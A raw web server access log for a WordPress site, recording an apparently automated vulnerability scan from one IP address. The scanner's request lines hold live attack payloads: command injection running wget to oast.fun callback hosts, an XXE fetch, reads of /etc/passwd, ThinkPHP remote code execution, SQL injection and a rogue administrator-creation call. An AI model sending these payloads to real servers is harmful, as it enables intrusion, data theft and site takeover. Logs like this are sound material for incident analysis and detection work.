165.232.54.158 - - [13/Jan/2026:16:57:41 +0800] "POST /cgi-bin/up.cgi HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.3 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:16:57:52 +0800] "POST /wp-cron.php?doing_wp_cron=1768294672.1438910961151123046875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:57:50 +0800] "POST /?wordfence_syncAttackData=1768294670.5591 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:57:48 +0800] "POST /admin/auth/reset-password HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0"
103.4.122.14 - - [13/Jan/2026:16:57:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768294678.3751111030578613281250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:57:55 +0800] "POST /boafrm/formSysCmd HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:00:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768294856.7416400909423828125000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:00:53 +0800] "POST /boafrm/formLogin HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
165.232.54.158 - - [13/Jan/2026:17:00:56 +0800] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"
103.4.122.14 - - [13/Jan/2026:17:01:36 +0800] "POST /wp-cron.php?doing_wp_cron=1768294896.5702691078186035156250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:01:33 +0800] "GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://d5iu610i9qj8svou82p0571wdhy81hj1b.oast.fun%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1" 404 52577 "-" "-"
165.232.54.158 - - [13/Jan/2026:17:01:34 +0800] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://d5iu610i9qj8svou82p0rfcqcchwpbzcs.oast.fun) HTTP/1.1" 404 52577 "-" "-"
165.232.54.158 - - [13/Jan/2026:17:03:36 +0800] "POST /dashboard/uploadID.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:03:39 +0800] "POST /?wordfence_syncAttackData=1768295019.7265 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:03:37 +0800] "POST /servlet/UploadServlet HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:03:41 +0800] "POST /wp-cron.php?doing_wp_cron=1768295021.2649579048156738281250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:03:43 +0800] "GET /test.txt HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:03:52 +0800] "POST /wp-cron.php?doing_wp_cron=1768295032.4529020786285400390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:03:49 +0800] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
103.4.122.14 - - [13/Jan/2026:17:03:57 +0800] "POST /wp-cron.php?doing_wp_cron=1768295037.4518210887908935546875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:03:54 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
165.232.54.158 - - [13/Jan/2026:17:06:28 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:06:34 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:07:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768295251.1933569908142089843750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:17:07:29 +0800] "POST /?wordfence_syncAttackData=1768295249.6205 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:07:27 +0800] "GET /wp-content/plugins/woocommerce-abandoned-cart/readme.txt HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:17:08:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768295282.6425321102142333984375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:07:59 +0800] "POST /xmlpserver/ReportTemplateService.xls HTTP/1.1" 404 10877 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0"
165.232.54.158 - - [13/Jan/2026:17:09:42 +0800] "GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//d5iu610i9qj8svou82p0k91bqh1j519ys.oast.fun/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:17:09:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768295396.7561340332031250000000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:09:53 +0800] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 10859 "nutritaste.com.au" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:17:11:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768295519.8548800945281982421875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:11:56 +0800] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Debian; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
103.4.122.14 - - [13/Jan/2026:17:12:04 +0800] "POST /wp-cron.php?doing_wp_cron=1768295524.3993980884552001953125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:12:01 +0800] "POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
103.4.122.14 - - [13/Jan/2026:17:12:38 +0800] "POST /wp-cron.php?doing_wp_cron=1768295558.7022509574890136718750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:12:35 +0800] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:17:13:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768295630.7091670036315917968750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:13:47 +0800] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 10880 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:13:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768295635.3446149826049804687500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:13:52 +0800] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 404 10875 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/120.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:15:17 +0800] "POST /wp-cron.php?doing_wp_cron=1768295717.3663339614868164062500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:15:13 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 10873 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
103.4.122.14 - - [13/Jan/2026:17:15:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768295722.3757779598236083984375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:15:19 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 10873 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
165.232.54.158 - - [13/Jan/2026:17:17:49 +0800] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [13/Jan/2026:17:17:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768295873.2353489398956298828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:17:17:51 +0800] "POST /?wordfence_syncAttackData=1768295871.6107 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:17:50 +0800] "GET /wp-content/plugins/total-donations/readme.txt HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
165.232.54.158 - - [13/Jan/2026:17:17:49 +0800] "POST /node/1?_format=hal_json HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:19:14 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
103.4.122.14 - - [13/Jan/2026:17:20:26 +0800] "POST /wp-cron.php?doing_wp_cron=1768296026.6618380546569824218750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:20:23 +0800] "POST /photo/p/api/album.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0"
165.232.54.158 - - [13/Jan/2026:17:20:25 +0800] "POST /service/extdirect HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0"
165.232.54.158 - - [13/Jan/2026:17:21:52 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 10873 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:131.0) Gecko/20100101 Firefox/131.0"
165.232.54.158 - - [13/Jan/2026:17:21:52 +0800] "POST /photo/p/api/album.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0"
103.4.122.14 - - [13/Jan/2026:17:21:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768296115.6564919948577880859375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:21:52 +0800] "POST /photo/p/api/album.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:17:22:01 +0800] "POST /wp-cron.php?doing_wp_cron=1768296121.8234388828277587890625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:21:58 +0800] "POST /_async/AsyncResponseService HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [13/Jan/2026:17:22:06 +0800] "POST /wp-cron.php?doing_wp_cron=1768296126.4764289855957031250000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:22:03 +0800] "GET /_async/favicon.ico HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:22:52 +0800] "POST /adxmlrpc.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
103.4.122.14 - - [13/Jan/2026:17:22:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768296176.7796480655670166015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:22:53 +0800] "GET /objects/getImageMP4.php?base64Url=YGlkID4gcktOSi50eHRg&format=jpg HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:17:22:54 +0800] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gTUNRaS50eHRg&format=jpg HTTP/1.1" 404 10876 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:22:55 +0800] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
165.232.54.158 - - [13/Jan/2026:17:22:58 +0800] "GET /objects/rKNJ.txt HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (SS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
103.4.122.14 - - [13/Jan/2026:17:23:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768296182.3198049068450927734375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:22:59 +0800] "GET /objects/MCQi.txt HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:24:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768296299.7961180210113525390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:24:56 +0800] "GET /tools/ajax/ConsoleResult.html?get HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/125.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:27:05 +0800] "POST /cgi-bin/supportInstaller HTTP/1.1" 403 199 "-" "MSIE"
165.232.54.158 - - [13/Jan/2026:17:27:07 +0800] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20FNsJfXiSgB.txt%60 HTTP/1.1" 403 199 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
103.4.122.14 - - [13/Jan/2026:17:27:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768296434.2473831176757812500000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:27:10 +0800] "GET /FNsJfXiSgB.txt HTTP/1.1" 404 10874 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:28:25 +0800] "POST /wp-cron.php?doing_wp_cron=1768296505.7071459293365478515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:28:21 +0800] "POST /api/timelion/run HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
165.232.54.158 - - [13/Jan/2026:17:29:53 +0800] "POST /php/connector.minimal.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Debian; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [13/Jan/2026:17:30:52 +0800] "POST /CDGServer3/ClientAjax HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
103.4.122.14 - - [13/Jan/2026:17:30:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768296659.4970409870147705078125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:17:30:57 +0800] "POST /?wordfence_syncAttackData=1768296657.803 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:30:53 +0800] "POST /autodiscover HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
103.4.122.14 - - [13/Jan/2026:17:31:04 +0800] "POST /wp-cron.php?doing_wp_cron=1768296664.3973081111907958984375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:31:01 +0800] "GET /objects/getImage.php?base64Url=YGlkID4gYmxranEudHh0YA===&format=png HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:31:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768296669.5283010005950927734375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:31:06 +0800] "GET /objects/getImageMP4.php?base64Url=YGlkID4gYmxranEudHh0YA===&format=jpg HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:17:31:15 +0800] "POST /wp-cron.php?doing_wp_cron=1768296675.1825270652770996093750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:31:12 +0800] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gYmxranEudHh0YA===&format=jpg HTTP/1.1" 404 10876 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17"
103.4.122.14 - - [13/Jan/2026:17:31:20 +0800] "POST /wp-cron.php?doing_wp_cron=1768296680.2742509841918945312500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:31:17 +0800] "GET /objects/blkjq.txt HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.1"
103.4.122.14 - - [13/Jan/2026:17:31:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768296719.8037939071655273437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:31:56 +0800] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [13/Jan/2026:17:33:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768296788.7139248847961425781250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:33:05 +0800] "POST /content/38Btk6mJ2lTyrwFwOctYJ9NJLM2 HTTP/1.1" 404 10883 "https://nutritaste.com.au" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.7 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [13/Jan/2026:17:33:06 +0800] "POST /search/ HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:33:11 +0800] "POST /content/38Btk6mJ2lTyrwFwOctYJ9NJLM2.af.internalsubmit.json HTTP/1.1" 404 10897 "https://nutritaste.com.au" "Mozilla/5.0 (Knoppix; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
103.4.122.14 - - [13/Jan/2026:17:33:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768296794.2338149547576904296875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:33:11 +0800] "POST /search/ HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:34:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768296854.7037470340728759765625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:34:11 +0800] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20thinkphp%20%7C%20rev HTTP/1.1" 200 11086 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/121.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:34:20 +0800] "POST /wp-cron.php?doing_wp_cron=1768296860.2661619186401367187500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:34:17 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 11022 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:35:00 +0800] "GET /include/plugin/payment/alipay/pay.php?id=pay%20where%201=1%20union%20select%201,2,CONCAT(md5(999999999)),4,5,6,7,8,9,10,11,12%23_ HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:17:35:07 +0800] "POST /wp-cron.php?doing_wp_cron=1768296907.7220869064331054687500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:35:04 +0800] "GET /labkey/home/project-begin.view HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.7 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:17:35:11 +0800] "POST /wp-cron.php?doing_wp_cron=1768296911.2564411163330078125000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:35:08 +0800] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 10859 "https://nutritaste.com.au/artifactory/webapp/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:17:37:25 +0800] "POST /wp-cron.php?doing_wp_cron=1768297045.7418630123138427734375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:37:22 +0800] "POST /sitecore/shell/Applications/Security/CreateNewUser/CreateNewUser.aspx HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
165.232.54.158 - - [13/Jan/2026:17:38:31 +0800] "POST /graphql HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
165.232.54.158 - - [13/Jan/2026:17:38:33 +0800] "POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/118.0"
103.4.122.14 - - [13/Jan/2026:17:38:49 +0800] "POST /wp-cron.php?doing_wp_cron=1768297129.1760630607604980468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:17:38:47 +0800] "POST /?wordfence_syncAttackData=1768297127.5715 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:38:45 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:40:06 +0800] "GET /wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=SjnhaG&user_pass=xQWroM HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:17:41:15 +0800] "GET /backupsettings.dat HTTP/1.1" 403 199 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:135.0) Gecko/20100101 Firefox/135.0"
165.232.54.158 - - [13/Jan/2026:17:41:17 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
165.232.54.158 - - [13/Jan/2026:17:42:12 +0800] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:17:42:35 +0800] "POST /wp-cron.php?doing_wp_cron=1768297355.1616220474243164062500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
